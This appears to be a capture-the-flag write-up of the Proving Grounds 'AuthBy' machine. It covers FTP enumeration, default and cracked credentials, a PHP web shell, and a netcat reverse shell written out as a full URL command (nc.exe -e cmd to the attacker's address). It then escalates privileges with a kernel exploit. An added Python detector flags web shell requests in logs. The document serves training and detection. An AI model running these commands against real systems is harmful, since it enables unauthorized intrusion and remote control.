Proving Grounds | AuthBy

Jm Villano
4 min read · Aug 13, 2021

Scanning:

Host is up, received user-set (0.24s latency).
Scanned at 2021-08-12 23:28:35 EDT for 240s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 zFTPServer 6.0 build 2011-10-17
242/tcp open http syn-ack ttl 127 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open zftp-admin syn-ack ttl 127 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.18 seconds
Raw packets sent: 131208 (5.773MB) | Rcvd: 153 (6.972KB)

Enumeration:

Anonymous access is enabled on Port 21.

Navigating to the accounts directory, we can observe the accounts configured on the FTP service.

Offsec, anonymous, admin

With these accounts present on the FTP service, we can guess passwords for them or use hydra to brute-force them.

We are able to log in to the admin account using admin:admin.

Looks like we have landed on the web root directory and are able to view the .ht files.

We have the user offsec, its associated MD5 password hash, and the directory path of the web server.

First off, let's try to crack the hash and see if we get a match in the rockyou.txt wordlist.

Looks like we do → offsec:elite

We can use this credential to log in to the site.

Exploitation:

Since we have admin access to the FTP service, we are able to upload files into the web directory. We can upload a PHP web shell there and open it in the browser to reach our shell.

With our PHP web shell, we get remote code execution on the target.

Now that we have a foothold on the target, let's transfer nc.exe to it so we can create a netcat reverse shell.

After transferring nc.exe, we simply run it through the web shell to connect back to our listener → http://192.168.149.46:242/shell.php?cmd=C:\Users\Public\nc.exe 192.168.49.149 21 -e cmd
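
From the defender's side, the web shell traffic above leaves a clear trace in the Apache access log. The following Python script is an added example (not part of the original walkthrough): it parses combined-format log lines, flags requests to .php files that carry a command-style query parameter, and raises the severity when the decoded value contains reverse-shell tooling such as nc.exe. The log lines, the parameter-name set and the indicator list are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not from the original post);
# lines 2 and 3 mirror the kind of traffic a PHP web shell on port 242 produces.
SAMPLE_LOG_LINES = [
    r'192.168.49.149 - - [12/Aug/2021:23:40:01 -0400] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'192.168.49.149 - - [12/Aug/2021:23:41:10 -0400] "GET /shell.php?cmd=whoami HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    r'192.168.49.149 - - [12/Aug/2021:23:42:17 -0400] "GET /shell.php?cmd=C:\Users\Public\nc.exe%20192.168.49.149%2021%20-e%20cmd HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    r'10.0.0.5 - - [12/Aug/2021:23:43:00 -0400] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter names typical of simple PHP web shells, and substrings that indicate
# command execution or a reverse shell; both are assumed lists, not a complete catalogue.
CMD_PARAMS = {"cmd", "exec", "command", "c"}
INDICATORS = ("nc.exe", "-e cmd", "cmd.exe", "powershell", "whoami", "certutil", "net user")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_requests(lines):
    """Flag .php requests with a command-style parameter; 'high' if an indicator matches, else 'medium'."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlparse(rec["target"])
        if not url.path.lower().endswith(".php") or not url.query:
            continue
        # parse_qs percent-decodes values, so '%20' is already a space here.
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if name.lower() not in CMD_PARAMS:
                continue
            for value in values:
                hits = [i for i in INDICATORS if i in value.lower()]
                findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": url.path,
                                 "param": name, "value": value, "indicators": hits,
                                 "severity": "high" if hits else "medium"})
    return findings
```

Run over the real access log, the "medium" hits are worth reviewing alongside the FTP server's upload log, since a freshly uploaded .php file that immediately receives cmd= requests is the pattern this walkthrough produces.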

Privilege Escalation:

Looking at the systeminfo output, we notice that the target has no patches installed and is running Windows Server 2008.

There are a couple of ways to escalate on this machine, most notably Juicy Potato and a number of kernel exploits.

One of the kernel exploits is https://www.exploit-db.com/exploits/40564, in which the Ancillary Function Driver (AFD) improperly validates input passed from user mode to the kernel.

The compilation instructions for the exploit are also included in the PoC.

Now that we have our exploit binary ready, let's transfer it to the target and run it to obtain SYSTEM privileges.
